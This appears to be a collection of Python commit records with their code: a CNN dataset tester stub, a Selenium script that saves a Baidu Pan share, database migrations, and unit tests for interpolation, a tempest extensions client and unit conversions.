Structure of the test function for Dataset working - we will test various CNN models on it and attach to them various custom tops
|
Python
|
mit
|
previtus/MGR-Project-Code,previtus/MGR-Project-Code,previtus/MGR-Project-Code
|
Structure of the test function for Dataset working - we will test various CNN models on it and attach to them various custom tops
|
import DatasetHandler.CreateDataset as CreateDataset
# Test functions to handle models
def DatasetTester(dataset, dataset_uid):
# Load dataset, report input sizes
# Cook features for various models
# Report feature output sizes
# Try top models - regular with fixed size or the "heatmap"
return []
def main():
[dataset, uniqueId] = CreateDataset.load_1200x_marked_299x299(desired_number=50, seed=42)
DatasetTester(dataset, dataset_uid=uniqueId)
main()
|
<commit_before><commit_msg>Structure of the test function for Dataset working - we will test various CNN models on it and attach to them various custom tops<commit_after>
|
import DatasetHandler.CreateDataset as CreateDataset
# Test functions to handle models
def DatasetTester(dataset, dataset_uid):
# Load dataset, report input sizes
# Cook features for various models
# Report feature output sizes
# Try top models - regular with fixed size or the "heatmap"
return []
def main():
[dataset, uniqueId] = CreateDataset.load_1200x_marked_299x299(desired_number=50, seed=42)
DatasetTester(dataset, dataset_uid=uniqueId)
main()
|
Structure of the test function for Dataset working - we will test various CNN models on it and attach to them various custom topsimport DatasetHandler.CreateDataset as CreateDataset
# Test functions to handle models
def DatasetTester(dataset, dataset_uid):
# Load dataset, report input sizes
# Cook features for various models
# Report feature output sizes
# Try top models - regular with fixed size or the "heatmap"
return []
def main():
[dataset, uniqueId] = CreateDataset.load_1200x_marked_299x299(desired_number=50, seed=42)
DatasetTester(dataset, dataset_uid=uniqueId)
main()
|
<commit_before><commit_msg>Structure of the test function for Dataset working - we will test various CNN models on it and attach to them various custom tops<commit_after>import DatasetHandler.CreateDataset as CreateDataset
# Test functions to handle models
def DatasetTester(dataset, dataset_uid):
# Load dataset, report input sizes
# Cook features for various models
# Report feature output sizes
# Try top models - regular with fixed size or the "heatmap"
return []
def main():
[dataset, uniqueId] = CreateDataset.load_1200x_marked_299x299(desired_number=50, seed=42)
DatasetTester(dataset, dataset_uid=uniqueId)
main()
|
|
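A sketch of the first step the comments describe (reporting input sizes), assuming the dataset yields (image, label) pairs with numpy-style shapes:

def report_input_sizes(dataset, limit=3):
    # Assumption: each item is an (image_array, label) pair.
    for i, (image, label) in enumerate(dataset[:limit]):
        print('sample', i, 'image shape:', image.shape, 'label:', label)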
8f3052a743a6be0c6191b47a3f9c3ee366c8fa58
|
YouKnowShit/Save2BCloud.py
|
YouKnowShit/Save2BCloud.py
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
browser = webdriver.Firefox(webdriver.FirefoxProfile("C:\\Users\\jiang\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5xd6vmv0.default-1480350130384"))
browser.get("http://www.baidu.com")
browser.get("http://pan.baidu.com/s/1i5DLdit")
browser.find_element_by_id("accessCode").clear()
browser.find_element_by_id("accessCode").send_keys("ts63")
browser.find_element_by_class_name("g-button-right").click()
time.sleep(5)
browser.find_element_by_class_name("g-button-right").click()
time.sleep(3)
browser.find_element_by_xpath("//*[@id=\"fileTreeDialog\"]/div[3]/a[2]/span/span").click()
|
Save file to BD yun.
|
Save file to BD yun.
|
Python
|
mit
|
jiangtianyu2009/PiSoftCake
|
Save file to BD yun.
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
browser = webdriver.Firefox(webdriver.FirefoxProfile("C:\\Users\\jiang\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5xd6vmv0.default-1480350130384"))
browser.get("http://www.baidu.com")
browser.get("http://pan.baidu.com/s/1i5DLdit")
browser.find_element_by_id("accessCode").clear()
browser.find_element_by_id("accessCode").send_keys("ts63")
browser.find_element_by_class_name("g-button-right").click()
time.sleep(5)
browser.find_element_by_class_name("g-button-right").click()
time.sleep(3)
browser.find_element_by_xpath("//*[@id=\"fileTreeDialog\"]/div[3]/a[2]/span/span").click()
|
<commit_before><commit_msg>Save file to BD yun.<commit_after>
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
browser = webdriver.Firefox(webdriver.FirefoxProfile("C:\\Users\\jiang\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5xd6vmv0.default-1480350130384"))
browser.get("http://www.baidu.com")
browser.get("http://pan.baidu.com/s/1i5DLdit")
browser.find_element_by_id("accessCode").clear()
browser.find_element_by_id("accessCode").send_keys("ts63")
browser.find_element_by_class_name("g-button-right").click()
time.sleep(5)
browser.find_element_by_class_name("g-button-right").click()
time.sleep(3)
browser.find_element_by_xpath("//*[@id=\"fileTreeDialog\"]/div[3]/a[2]/span/span").click()
|
Save file to BD yun.from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
browser = webdriver.Firefox(webdriver.FirefoxProfile("C:\\Users\\jiang\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5xd6vmv0.default-1480350130384"))
browser.get("http://www.baidu.com")
browser.get("http://pan.baidu.com/s/1i5DLdit")
browser.find_element_by_id("accessCode").clear()
browser.find_element_by_id("accessCode").send_keys("ts63")
browser.find_element_by_class_name("g-button-right").click()
time.sleep(5)
browser.find_element_by_class_name("g-button-right").click()
time.sleep(3)
browser.find_element_by_xpath("//*[@id=\"fileTreeDialog\"]/div[3]/a[2]/span/span").click()
|
<commit_before><commit_msg>Save file to BD yun.<commit_after>from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
browser = webdriver.Firefox(webdriver.FirefoxProfile("C:\\Users\\jiang\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5xd6vmv0.default-1480350130384"))
browser.get("http://www.baidu.com")
browser.get("http://pan.baidu.com/s/1i5DLdit")
browser.find_element_by_id("accessCode").clear()
browser.find_element_by_id("accessCode").send_keys("ts63")
browser.find_element_by_class_name("g-button-right").click()
time.sleep(5)
browser.find_element_by_class_name("g-button-right").click()
time.sleep(3)
browser.find_element_by_xpath("//*[@id=\"fileTreeDialog\"]/div[3]/a[2]/span/span").click()
|
|
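The fixed time.sleep calls above make the flow brittle. A hedged sketch of the same steps using Selenium's explicit waits (WebDriverWait and expected_conditions, both part of selenium.webdriver.support); the locators are taken from the original script and the 10-second timeout is an assumption:

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

browser = webdriver.Firefox()
browser.get("http://pan.baidu.com/s/1i5DLdit")
wait = WebDriverWait(browser, 10)  # poll up to 10 s instead of sleeping blindly
# Type the access code once the field actually exists in the DOM.
field = wait.until(EC.presence_of_element_located((By.ID, "accessCode")))
field.send_keys("ts63")
# Click the button only when it has become clickable.
wait.until(EC.element_to_be_clickable((By.CLASS_NAME, "g-button-right"))).click()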
ace8c1dfbb05c3ffcc577ac966822e1c2752d9ea
|
migrations/versions/bd22b917f9f7_update_histogram_menu_order.py
|
migrations/versions/bd22b917f9f7_update_histogram_menu_order.py
|
"""Update Histogram menu order
Revision ID: bd22b917f9f7
Revises: c4b87364ce33
Create Date: 2021-10-09 00:07:26.892344
"""
from alembic import op
from sqlalchemy.sql import text
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'bd22b917f9f7'
down_revision = 'c4b87364ce33'
branch_labels = None
depends_on = None
def upgrade():
op.execute(text("UPDATE `tahiti`.`operation_form` SET `order` = '1' WHERE (`id` = '142');"))
def downgrade():
op.execute(text("UPDATE `tahiti`.`operation_form` SET `order` = '10' WHERE (`id` = '142');"))
|
Fix the menu order of histogram tabs
|
Fix the menu order of histogram tabs
|
Python
|
apache-2.0
|
eubr-bigsea/tahiti,eubr-bigsea/tahiti,eubr-bigsea/tahiti,eubr-bigsea/tahiti
|
Fix the menu order of histogram tabs
|
"""Update Histogram menu order
Revision ID: bd22b917f9f7
Revises: c4b87364ce33
Create Date: 2021-10-09 00:07:26.892344
"""
from alembic import op
from sqlalchemy.sql import text
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'bd22b917f9f7'
down_revision = 'c4b87364ce33'
branch_labels = None
depends_on = None
def upgrade():
op.execute(text("UPDATE `tahiti`.`operation_form` SET `order` = '1' WHERE (`id` = '142');"))
def downgrade():
op.execute(text("UPDATE `tahiti`.`operation_form` SET `order` = '10' WHERE (`id` = '142');"))
|
<commit_before><commit_msg>Fix the menu order of histogram tabs<commit_after>
|
"""Update Histogram menu order
Revision ID: bd22b917f9f7
Revises: c4b87364ce33
Create Date: 2021-10-09 00:07:26.892344
"""
from alembic import op
from sqlalchemy.sql import text
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'bd22b917f9f7'
down_revision = 'c4b87364ce33'
branch_labels = None
depends_on = None
def upgrade():
op.execute(text("UPDATE `tahiti`.`operation_form` SET `order` = '1' WHERE (`id` = '142');"))
def downgrade():
op.execute(text("UPDATE `tahiti`.`operation_form` SET `order` = '10' WHERE (`id` = '142');"))
|
Fix the menu order of histogram tabs"""Update Histogram menu order
Revision ID: bd22b917f9f7
Revises: c4b87364ce33
Create Date: 2021-10-09 00:07:26.892344
"""
from alembic import op
from sqlalchemy.sql import text
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'bd22b917f9f7'
down_revision = 'c4b87364ce33'
branch_labels = None
depends_on = None
def upgrade():
op.execute(text("UPDATE `tahiti`.`operation_form` SET `order` = '1' WHERE (`id` = '142');"))
def downgrade():
op.execute(text("UPDATE `tahiti`.`operation_form` SET `order` = '10' WHERE (`id` = '142');"))
|
<commit_before><commit_msg>Fix the menu order of histogram tabs<commit_after>"""Update Histogram menu order
Revision ID: bd22b917f9f7
Revises: c4b87364ce33
Create Date: 2021-10-09 00:07:26.892344
"""
from alembic import op
from sqlalchemy.sql import text
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'bd22b917f9f7'
down_revision = 'c4b87364ce33'
branch_labels = None
depends_on = None
def upgrade():
op.execute(text("UPDATE `tahiti`.`operation_form` SET `order` = '1' WHERE (`id` = '142');"))
def downgrade():
op.execute(text("UPDATE `tahiti`.`operation_form` SET `order` = '10' WHERE (`id` = '142');"))
|
|
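The raw UPDATE statements above splice the values straight into the SQL string. A hedged sketch of the same migration body with bound parameters via sqlalchemy.text - the helper name is invented, and the table and row id come from the original migration:

from alembic import op
from sqlalchemy.sql import text

def set_form_order(form_id, order):
    # op.get_bind() returns the connection the migration is running on;
    # :id and :order are bound parameters, not string interpolation.
    stmt = text("UPDATE operation_form SET `order` = :order WHERE id = :id")
    op.get_bind().execute(stmt, {"order": order, "id": form_id})

# upgrade() becomes set_form_order(142, 1); downgrade() becomes set_form_order(142, 10).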
7b09f0309460eb306ef74a0bedfcad82ae3d91a0
|
regparser/web/jobs/migrations/0012_auto_20161012_2059.py
|
regparser/web/jobs/migrations/0012_auto_20161012_2059.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.10 on 2016-10-12 20:59
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('jobs', '0011_auto_20161011_2135'),
]
operations = [
migrations.AlterField(
model_name='regulationfile',
name='hexhash',
field=models.CharField(max_length=64, primary_key=True, serialize=False),
),
]
|
Remove default keyword from hexhash key for RegulationFile.
|
Remove default keyword from hexhash key for RegulationFile.
|
Python
|
cc0-1.0
|
eregs/regulations-parser,tadhg-ohiggins/regulations-parser,tadhg-ohiggins/regulations-parser,eregs/regulations-parser
|
Remove default keyword from hexhash key for RegulationFile.
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.10 on 2016-10-12 20:59
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('jobs', '0011_auto_20161011_2135'),
]
operations = [
migrations.AlterField(
model_name='regulationfile',
name='hexhash',
field=models.CharField(max_length=64, primary_key=True, serialize=False),
),
]
|
<commit_before><commit_msg>Remove default keyword from hexhash key for RegulationFile.<commit_after>
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.10 on 2016-10-12 20:59
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('jobs', '0011_auto_20161011_2135'),
]
operations = [
migrations.AlterField(
model_name='regulationfile',
name='hexhash',
field=models.CharField(max_length=64, primary_key=True, serialize=False),
),
]
|
Remove default keyword from hexhash key for RegulationFile.# -*- coding: utf-8 -*-
# Generated by Django 1.9.10 on 2016-10-12 20:59
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('jobs', '0011_auto_20161011_2135'),
]
operations = [
migrations.AlterField(
model_name='regulationfile',
name='hexhash',
field=models.CharField(max_length=64, primary_key=True, serialize=False),
),
]
|
<commit_before><commit_msg>Remove default keyword from hexhash key for RegulationFile.<commit_after># -*- coding: utf-8 -*-
# Generated by Django 1.9.10 on 2016-10-12 20:59
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('jobs', '0011_auto_20161011_2135'),
]
operations = [
migrations.AlterField(
model_name='regulationfile',
name='hexhash',
field=models.CharField(max_length=64, primary_key=True, serialize=False),
),
]
|
|
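For context, the AlterField above corresponds to a model field with no default. A hedged reconstruction of what the RegulationFile field likely looks like after this migration - the model body is inferred from the migration, not copied from the repository:

from django.db import models

class RegulationFile(models.Model):
    # SHA-256 hex digest used as the primary key; with no default,
    # callers must always supply the hash explicitly.
    hexhash = models.CharField(max_length=64, primary_key=True)

    class Meta:
        app_label = "jobs"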
f9b92cb7df1b5965fc14cefc423a8bbc664076b9
|
avena/tests/test-interp.py
|
avena/tests/test-interp.py
|
#!/usr/bin/env python
from numpy import all, allclose, array, float32, max
from .. import interp
def test_interp2():
x = array([
[0, 1, 0],
[1, 1, 1],
[0, 1, 0],
], dtype=float32)
y = interp._interp2(1.0, x)
assert allclose(x, y)
if __name__ == '__main__':
pass
|
Add a unit test for the interp module.
|
Add a unit test for the interp module.
|
Python
|
isc
|
eliteraspberries/avena
|
Add a unit test for the interp module.
|
#!/usr/bin/env python
from numpy import all, allclose, array, float32, max
from .. import interp
def test_interp2():
x = array([
[0, 1, 0],
[1, 1, 1],
[0, 1, 0],
], dtype=float32)
y = interp._interp2(1.0, x)
assert allclose(x, y)
if __name__ == '__main__':
pass
|
<commit_before><commit_msg>Add a unit test for the interp module.<commit_after>
|
#!/usr/bin/env python
from numpy import all, allclose, array, float32, max
from .. import interp
def test_interp2():
x = array([
[0, 1, 0],
[1, 1, 1],
[0, 1, 0],
], dtype=float32)
y = interp._interp2(1.0, x)
assert allclose(x, y)
if __name__ == '__main__':
pass
|
Add a unit test for the interp module.#!/usr/bin/env python
from numpy import all, allclose, array, float32, max
from .. import interp
def test_interp2():
x = array([
[0, 1, 0],
[1, 1, 1],
[0, 1, 0],
], dtype=float32)
y = interp._interp2(1.0, x)
assert allclose(x, y)
if __name__ == '__main__':
pass
|
<commit_before><commit_msg>Add a unit test for the interp module.<commit_after>#!/usr/bin/env python
from numpy import all, allclose, array, float32, max
from .. import interp
def test_interp2():
x = array([
[0, 1, 0],
[1, 1, 1],
[0, 1, 0],
], dtype=float32)
y = interp._interp2(1.0, x)
assert allclose(x, y)
if __name__ == '__main__':
pass
|
|
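The interp module under test is not included in this record. Purely as a hedged illustration of a resampler the assertion above would accept - the name and nearest-neighbour behaviour are assumptions - a factor of 1.0 must return the input unchanged:

import numpy as np

def interp2(factor, image):
    # Nearest-neighbour resampling; at factor 1.0 the index arrays are
    # the identity, so the output equals the input, which is what the
    # allclose check in test_interp2 asserts.
    rows = (np.arange(int(round(image.shape[0] * factor))) / factor).astype(int)
    cols = (np.arange(int(round(image.shape[1] * factor))) / factor).astype(int)
    return image[rows][:, cols]

x = np.eye(3, dtype=np.float32)
assert np.allclose(interp2(1.0, x), x)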
0d649b26e092f2678f2a39f9245568c9cf14b799
|
tempest/tests/services/compute/test_extensions_client.py
|
tempest/tests/services/compute/test_extensions_client.py
|
# Copyright 2015 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import httplib2
from oslo_serialization import jsonutils as json
from oslotest import mockpatch
from tempest.services.compute.json import extensions_client
from tempest.tests import base
from tempest.tests import fake_auth_provider
class TestExtensionsClient(base.TestCase):
def setUp(self):
super(TestExtensionsClient, self).setUp()
fake_auth = fake_auth_provider.FakeAuthProvider()
self.client = extensions_client.ExtensionsClient(
fake_auth, 'compute', 'regionOne')
def _test_list_extensions(self, bytes_body=False):
body = '{"extensions": []}'
if bytes_body:
body = body.encode('utf-8')
expected = []
response = (httplib2.Response({'status': 200}), body)
self.useFixture(mockpatch.Patch(
'tempest.common.service_client.ServiceClient.get',
return_value=response))
self.assertEqual(expected, self.client.list_extensions())
def test_list_extensions_with_str_body(self):
self._test_list_extensions()
def test_list_extensions_with_bytes_body(self):
self._test_list_extensions(bytes_body=True)
def _test_show_extension(self, bytes_body=False):
expected = {
"updated": "2011-06-09T00:00:00Z",
"name": "Multinic",
"links": [],
"namespace":
"http://docs.openstack.org/compute/ext/multinic/api/v1.1",
"alias": "NMN",
"description": u'\u2740(*\xb4\u25e1`*)\u2740'
}
serialized_body = json.dumps({"extension": expected})
if bytes_body:
serialized_body = serialized_body.encode('utf-8')
mocked_resp = (httplib2.Response({'status': 200}), serialized_body)
self.useFixture(mockpatch.Patch(
'tempest.common.service_client.ServiceClient.get',
return_value=mocked_resp))
resp = self.client.show_extension("NMN")
self.assertEqual(expected, resp)
def test_show_extension_with_str_body(self):
self._test_show_extension()
def test_show_extension_with_bytes_body(self):
self._test_show_extension(bytes_body=True)
|
Add unit tests for extensions_client
|
Add unit tests for extensions_client
This patch adds unit tests for extensions_client.
Change-Id: I37ff50ff31ca9a2c4608f656247a0073fbfbfb61
|
Python
|
apache-2.0
|
flyingfish007/tempest,JioCloud/tempest,rakeshmi/tempest,manasi24/tempest,pczerkas/tempest,xbezdick/tempest,akash1808/tempest,roopali8/tempest,roopali8/tempest,Tesora/tesora-tempest,nunogt/tempest,JioCloud/tempest,cisco-openstack/tempest,xbezdick/tempest,manasi24/jiocloud-tempest-qatempest,dkalashnik/tempest,openstack/tempest,Juniper/tempest,Tesora/tesora-tempest,izadorozhna/tempest,bigswitch/tempest,manasi24/tempest,hayderimran7/tempest,zsoltdudas/lis-tempest,akash1808/tempest,flyingfish007/tempest,pandeyop/tempest,tudorvio/tempest,vedujoshi/tempest,varunarya10/tempest,varunarya10/tempest,dkalashnik/tempest,sebrandon1/tempest,LIS/lis-tempest,zsoltdudas/lis-tempest,nunogt/tempest,tudorvio/tempest,manasi24/jiocloud-tempest-qatempest,hayderimran7/tempest,pczerkas/tempest,LIS/lis-tempest,bigswitch/tempest,Juniper/tempest,vedujoshi/tempest,openstack/tempest,masayukig/tempest,pandeyop/tempest,cisco-openstack/tempest,tonyli71/tempest,masayukig/tempest,tonyli71/tempest,izadorozhna/tempest,sebrandon1/tempest,rakeshmi/tempest
|
Add unit tests for extensions_client
This patch adds unit tests for extensions_client.
Change-Id: I37ff50ff31ca9a2c4608f656247a0073fbfbfb61
|
# Copyright 2015 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import httplib2
from oslo_serialization import jsonutils as json
from oslotest import mockpatch
from tempest.services.compute.json import extensions_client
from tempest.tests import base
from tempest.tests import fake_auth_provider
class TestExtensionsClient(base.TestCase):
def setUp(self):
super(TestExtensionsClient, self).setUp()
fake_auth = fake_auth_provider.FakeAuthProvider()
self.client = extensions_client.ExtensionsClient(
fake_auth, 'compute', 'regionOne')
def _test_list_extensions(self, bytes_body=False):
body = '{"extensions": []}'
if bytes_body:
body = body.encode('utf-8')
expected = []
response = (httplib2.Response({'status': 200}), body)
self.useFixture(mockpatch.Patch(
'tempest.common.service_client.ServiceClient.get',
return_value=response))
self.assertEqual(expected, self.client.list_extensions())
def test_list_extensions_with_str_body(self):
self._test_list_extensions()
def test_list_extensions_with_bytes_body(self):
self._test_list_extensions(bytes_body=True)
def _test_show_extension(self, bytes_body=False):
expected = {
"updated": "2011-06-09T00:00:00Z",
"name": "Multinic",
"links": [],
"namespace":
"http://docs.openstack.org/compute/ext/multinic/api/v1.1",
"alias": "NMN",
"description": u'\u2740(*\xb4\u25e1`*)\u2740'
}
serialized_body = json.dumps({"extension": expected})
if bytes_body:
serialized_body = serialized_body.encode('utf-8')
mocked_resp = (httplib2.Response({'status': 200}), serialized_body)
self.useFixture(mockpatch.Patch(
'tempest.common.service_client.ServiceClient.get',
return_value=mocked_resp))
resp = self.client.show_extension("NMN")
self.assertEqual(expected, resp)
def test_show_extension_with_str_body(self):
self._test_show_extension()
def test_show_extension_with_bytes_body(self):
self._test_show_extension(bytes_body=True)
|
<commit_before><commit_msg>Add unit tests for extensions_client
This patch adds unit tests for extensions_client.
Change-Id: I37ff50ff31ca9a2c4608f656247a0073fbfbfb61<commit_after>
|
# Copyright 2015 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import httplib2
from oslo_serialization import jsonutils as json
from oslotest import mockpatch
from tempest.services.compute.json import extensions_client
from tempest.tests import base
from tempest.tests import fake_auth_provider
class TestExtensionsClient(base.TestCase):
def setUp(self):
super(TestExtensionsClient, self).setUp()
fake_auth = fake_auth_provider.FakeAuthProvider()
self.client = extensions_client.ExtensionsClient(
fake_auth, 'compute', 'regionOne')
def _test_list_extensions(self, bytes_body=False):
body = '{"extensions": []}'
if bytes_body:
body = body.encode('utf-8')
expected = []
response = (httplib2.Response({'status': 200}), body)
self.useFixture(mockpatch.Patch(
'tempest.common.service_client.ServiceClient.get',
return_value=response))
self.assertEqual(expected, self.client.list_extensions())
def test_list_extensions_with_str_body(self):
self._test_list_extensions()
def test_list_extensions_with_bytes_body(self):
self._test_list_extensions(bytes_body=True)
def _test_show_extension(self, bytes_body=False):
expected = {
"updated": "2011-06-09T00:00:00Z",
"name": "Multinic",
"links": [],
"namespace":
"http://docs.openstack.org/compute/ext/multinic/api/v1.1",
"alias": "NMN",
"description": u'\u2740(*\xb4\u25e1`*)\u2740'
}
serialized_body = json.dumps({"extension": expected})
if bytes_body:
serialized_body = serialized_body.encode('utf-8')
mocked_resp = (httplib2.Response({'status': 200}), serialized_body)
self.useFixture(mockpatch.Patch(
'tempest.common.service_client.ServiceClient.get',
return_value=mocked_resp))
resp = self.client.show_extension("NMN")
self.assertEqual(expected, resp)
def test_show_extension_with_str_body(self):
self._test_show_extension()
def test_show_extension_with_bytes_body(self):
self._test_show_extension(bytes_body=True)
|
Add unit tests for extensions_client
This patch adds unit tests for extensions_client.
Change-Id: I37ff50ff31ca9a2c4608f656247a0073fbfbfb61# Copyright 2015 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import httplib2
from oslo_serialization import jsonutils as json
from oslotest import mockpatch
from tempest.services.compute.json import extensions_client
from tempest.tests import base
from tempest.tests import fake_auth_provider
class TestExtensionsClient(base.TestCase):
def setUp(self):
super(TestExtensionsClient, self).setUp()
fake_auth = fake_auth_provider.FakeAuthProvider()
self.client = extensions_client.ExtensionsClient(
fake_auth, 'compute', 'regionOne')
def _test_list_extensions(self, bytes_body=False):
body = '{"extensions": []}'
if bytes_body:
body = body.encode('utf-8')
expected = []
response = (httplib2.Response({'status': 200}), body)
self.useFixture(mockpatch.Patch(
'tempest.common.service_client.ServiceClient.get',
return_value=response))
self.assertEqual(expected, self.client.list_extensions())
def test_list_extensions_with_str_body(self):
self._test_list_extensions()
def test_list_extensions_with_bytes_body(self):
self._test_list_extensions(bytes_body=True)
def _test_show_extension(self, bytes_body=False):
expected = {
"updated": "2011-06-09T00:00:00Z",
"name": "Multinic",
"links": [],
"namespace":
"http://docs.openstack.org/compute/ext/multinic/api/v1.1",
"alias": "NMN",
"description": u'\u2740(*\xb4\u25e1`*)\u2740'
}
serialized_body = json.dumps({"extension": expected})
if bytes_body:
serialized_body = serialized_body.encode('utf-8')
mocked_resp = (httplib2.Response({'status': 200}), serialized_body)
self.useFixture(mockpatch.Patch(
'tempest.common.service_client.ServiceClient.get',
return_value=mocked_resp))
resp = self.client.show_extension("NMN")
self.assertEqual(expected, resp)
def test_show_extension_with_str_body(self):
self._test_show_extension()
def test_show_extension_with_bytes_body(self):
self._test_show_extension(bytes_body=True)
|
<commit_before><commit_msg>Add unit tests for extensions_client
This patch adds unit tests for extensions_client.
Change-Id: I37ff50ff31ca9a2c4608f656247a0073fbfbfb61<commit_after># Copyright 2015 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import httplib2
from oslo_serialization import jsonutils as json
from oslotest import mockpatch
from tempest.services.compute.json import extensions_client
from tempest.tests import base
from tempest.tests import fake_auth_provider
class TestExtensionsClient(base.TestCase):
def setUp(self):
super(TestExtensionsClient, self).setUp()
fake_auth = fake_auth_provider.FakeAuthProvider()
self.client = extensions_client.ExtensionsClient(
fake_auth, 'compute', 'regionOne')
def _test_list_extensions(self, bytes_body=False):
body = '{"extensions": []}'
if bytes_body:
body = body.encode('utf-8')
expected = []
response = (httplib2.Response({'status': 200}), body)
self.useFixture(mockpatch.Patch(
'tempest.common.service_client.ServiceClient.get',
return_value=response))
self.assertEqual(expected, self.client.list_extensions())
def test_list_extensions_with_str_body(self):
self._test_list_extensions()
def test_list_extensions_with_bytes_body(self):
self._test_list_extensions(bytes_body=True)
def _test_show_extension(self, bytes_body=False):
expected = {
"updated": "2011-06-09T00:00:00Z",
"name": "Multinic",
"links": [],
"namespace":
"http://docs.openstack.org/compute/ext/multinic/api/v1.1",
"alias": "NMN",
"description": u'\u2740(*\xb4\u25e1`*)\u2740'
}
serialized_body = json.dumps({"extension": expected})
if bytes_body:
serialized_body = serialized_body.encode('utf-8')
mocked_resp = (httplib2.Response({'status': 200}), serialized_body)
self.useFixture(mockpatch.Patch(
'tempest.common.service_client.ServiceClient.get',
return_value=mocked_resp))
resp = self.client.show_extension("NMN")
self.assertEqual(expected, resp)
def test_show_extension_with_str_body(self):
self._test_show_extension()
def test_show_extension_with_bytes_body(self):
self._test_show_extension(bytes_body=True)
|
|
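Each test above follows the same pattern: stub the transport, return a canned body, assert on the decoded result. A hedged distillation of that pattern using only the standard library - FakeClient and its method names are invented for illustration, not tempest APIs:

import json
import unittest
from unittest import mock

class FakeClient:
    def _get(self, url):
        raise NotImplementedError  # real HTTP transport, replaced in tests

    def list_extensions(self):
        status, body = self._get("/extensions")
        return json.loads(body)["extensions"]

class TestFakeClient(unittest.TestCase):
    def test_list_extensions(self):
        client = FakeClient()
        canned = (200, '{"extensions": []}')
        # Patch the transport so no real request is made.
        with mock.patch.object(client, "_get", return_value=canned):
            self.assertEqual([], client.list_extensions())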
cedf6f46768ee607b274bcb7fe10bb5042d5ef26
|
run_tests.py
|
run_tests.py
|
import unittest
from src.convert import kilometers_to_miles, miles_to_kilometers, \
years_to_minutes, minutes_to_years
class TestConvert(unittest.TestCase):
def test_km_2_mi(self):
actual = kilometers_to_miles(1)
expected = 0.621 # From Brian, from Google
self.assertAlmostEqual(actual, expected, delta = 0.01)
def test_mi_2_km(self):
actual = miles_to_kilometers(1)
expected = 1.609
self.assertAlmostEqual(actual, expected, delta = 0.01)
def test_yrs_2_min(self):
self.assertEqual(525600, years_to_minutes(1))
def test_min_2_yrs(self):
self.assertEqual(1, minutes_to_years(525600))
# Run the tests when this file is executed directly.
if __name__ == '__main__':
    unittest.main()
|
Test functions to convert units.
|
Test functions to convert units.
|
Python
|
mit
|
RoyGBivDash/Unit_Conversions
|
Test functions to convert units.
|
import unittest
from src.convert import kilometers_to_miles, miles_to_kilometers, \
years_to_minutes, minutes_to_years
class TestConvert(unittest.TestCase):
def test_km_2_mi(self):
actual = kilometers_to_miles(1)
expected = 0.621 # From Brian, from Google
self.assertAlmostEqual(actual, expected, delta = 0.01)
def test_mi_2_km(self):
actual = miles_to_kilometers(1)
expected = 1.609
self.assertAlmostEqual(actual, expected, delta = 0.01)
def test_yrs_2_min(self):
self.assertEqual(525600, years_to_minutes(1))
def test_min_2_yrs(self):
self.assertEqual(1, minutes_to_years(525600))
# Run the tests when this file is executed directly.
if __name__ == '__main__':
    unittest.main()
|
